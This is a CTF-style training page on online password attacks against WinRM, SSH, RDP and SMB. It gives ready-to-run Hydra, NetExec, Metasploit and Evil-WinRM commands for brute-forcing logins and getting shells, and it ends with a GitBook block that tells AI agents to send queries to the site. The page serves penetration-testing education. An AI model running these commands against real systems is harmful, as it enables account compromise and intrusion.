> For the complete documentation index, see [llms.txt](https://capcap-1.gitbook.io/capcap/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/network-services.md).

# Network Services

### Overview

Online brute-forcing attacks target **live network services** directly — unlike offline hash cracking, every attempt is a real network request to the target.

|        | Offline Cracking | Online Brute-Force     |
| ------ | ---------------- | ---------------------- |
| Target | Hash file        | Live service           |
| Speed  | Millions/sec     | Slow (network limited) |
| Risk   | None             | Account lockout        |
| Tools  | hashcat / JtR    | Hydra / NetExec        |

> **Always check password policy before spraying** — most environments lock accounts after 3-5 failed attempts.

***

### Tools

#### NetExec (nxc)

Swiss army knife for network service attacks. Supports SMB, WinRM, SSH, RDP, LDAP, MSSQL, FTP, VNC.

```bash
# Install
sudo apt-get -y install netexec

# General syntax
netexec <protocol> <target-IP> -u <user or userlist> -p <password or passwordlist>

# Protocol-specific help
netexec smb -h
netexec winrm -h
```

**Key output indicators:**

| Output              | Meaning                                   |
| ------------------- | ----------------------------------------- |
| `[+] user:password` | Valid credentials                         |
| `(Pwn3d!)`          | Admin-level access — can execute commands |
| `[-]`               | Invalid credentials                       |

**Useful flags:**

```bash
--continue-on-success    # Keep going after finding valid creds (useful for password spraying)
--shares                 # Enumerate SMB shares after auth
--no-bruteforce          # Test one user:pass pair, not every combination
```

***

#### Hydra

Widely used brute-forcing tool for SSH, RDP, SMB, FTP, HTTP and more.

```bash
# General syntax
hydra -L user.list -P password.list <protocol>://<target-IP>

# Flags
-L    # File containing usernames
-P    # File containing passwords
-l    # Single username
-p    # Single password
-t    # Number of parallel tasks (lower = safer, some services need -t 4 or -t 1)
-V    # Verbose — show every attempt
```

***

#### Evil-WinRM

Shell tool for WinRM. Gives you a PowerShell session on the remote Windows machine.

```bash
# Install
sudo gem install evil-winrm

# Connect
evil-winrm -i <target-IP> -u <username> -p <password>
```

***

#### smbclient

Browse SMB shares after obtaining credentials.

```bash
smbclient -U <user> \\\\<target-IP>\\<SHARENAME>

# Inside smbclient:
ls                        # List files
get <filename>            # Download file
put <filename>            # Upload file
cd <directory>            # Change directory
```

***

### WinRM (Ports 5985 / 5986)

Windows Remote Management — Microsoft's remote management protocol based on SOAP/XML. Allows executing PowerShell commands remotely.

* Port **5985** = HTTP
* Port **5986** = HTTPS
* Must be manually enabled on Windows 10/11
* Uses certificates or specific auth mechanisms for security

#### Brute-force

```bash
netexec winrm 10.129.42.197 -u user.list -p password.list
```

Example output:

```
WINRM  10.129.42.197  5985  NONE  [+] None\user:password (Pwn3d!)
```

#### Get a shell

```bash
evil-winrm -i 10.129.42.197 -u user -p password
```

Gives you a `PS C:\Users\user\Documents>` PowerShell prompt on the remote machine.

***

### SSH (Port 22)

Secure Shell — standard for remote Linux access. Also available on Windows. Uses three cryptographic methods:

| Method                | Purpose                               | Example algorithms         |
| --------------------- | ------------------------------------- | -------------------------- |
| Symmetric encryption  | Encrypts actual data after connection | AES, Blowfish, 3DES        |
| Asymmetric encryption | Initial handshake, key exchange       | RSA, ECDSA, Diffie-Hellman |
| Hashing               | Verifies data integrity               | SHA-256, MD5               |

> If an attacker finds an unprotected SSH private key, they can log in without credentials at all.

#### Brute-force

```bash
hydra -L user.list -P password.list ssh://10.129.42.197

# Limit parallel tasks — SSH servers rate-limit too many simultaneous connections
hydra -L user.list -P password.list ssh://10.129.42.197 -t 4
```

#### Connect after finding credentials

```bash
ssh user@10.129.42.197
```

***

### RDP (Port 3389)

Remote Desktop Protocol — Microsoft's GUI remote access protocol for Windows. Gives a full desktop session. Uses both TCP and UDP.

#### Brute-force

```bash
hydra -L user.list -P password.list rdp://10.129.42.197

# RDP doesn't handle many parallel connections — reduce threads
hydra -L user.list -P password.list rdp://10.129.42.197 -t 4
```

> **Note:** Hydra may return `account not active for remote desktop` even when credentials are correct — this means the account exists and password is right, but RDP access isn't enabled for that specific user.

#### Connect after finding credentials

```bash
xfreerdp /v:10.129.42.197 /u:user /p:password
```

Accept the certificate prompt with `Y`.

***

### SMB (Port 445)

Server Message Block — Windows file sharing protocol. Used for shared folders, printers, and inter-process communication. Also known as CIFS. Linux equivalent is NFS. Open-source implementation = Samba.

#### Brute-force with Hydra

```bash
# SMB only allows 1 parallel task
hydra -L user.list -P password.list smb://10.129.42.197
```

#### If Hydra gives `invalid reply` error

Hydra can't handle SMBv3 — use Metasploit instead:

```bash
msfconsole -q

use auxiliary/scanner/smb/smb_login

set user_file user.list
set pass_file password.list
set rhosts 10.129.42.197
set stop_on_success true

run
```

#### Enumerate shares after finding credentials

```bash
netexec smb 10.129.42.197 -u "user" -p "password" --shares
```

Example output:

```
SMB  10.129.42.197  445  WINSRV  [+] WINSRV\user:password
SMB  10.129.42.197  445  WINSRV  Share        Permissions
SMB  10.129.42.197  445  WINSRV  ADMIN$
SMB  10.129.42.197  445  WINSRV  C$
SMB  10.129.42.197  445  WINSRV  SHARENAME    READ,WRITE
SMB  10.129.42.197  445  WINSRV  IPC$         READ
```

#### Browse a share

```bash
smbclient -U user \\\\10.129.42.197\\SHARENAME
```

***

### Quick Reference

#### Tool by protocol

| Protocol | Port      | Brute-force  | Connect                          |
| -------- | --------- | ------------ | -------------------------------- |
| WinRM    | 5985/5986 | NetExec      | Evil-WinRM                       |
| SSH      | 22        | Hydra `-t 4` | `ssh user@ip`                    |
| RDP      | 3389      | Hydra `-t 4` | `xfreerdp /v:ip /u:user /p:pass` |
| SMB      | 445       | Hydra / MSF  | smbclient / NetExec              |

#### Attack flow

```
1. Identify open service and port (nmap)
2. Build user.list and password.list
3. Brute-force with Hydra or NetExec
4. Confirm valid credentials
5. Connect with appropriate tool
6. Enumerate (shares, files, commands)
```

#### NetExec one-liners

```bash
# WinRM
netexec winrm <ip> -u user.list -p password.list

# SMB with share enumeration
netexec smb <ip> -u "user" -p "password" --shares

# SSH
netexec ssh <ip> -u user.list -p password.list

# RDP
netexec rdp <ip> -u user.list -p password.list
```


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://capcap-1.gitbook.io/capcap/readme/ctf-modules/exploitation/password-attacks/network-services.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
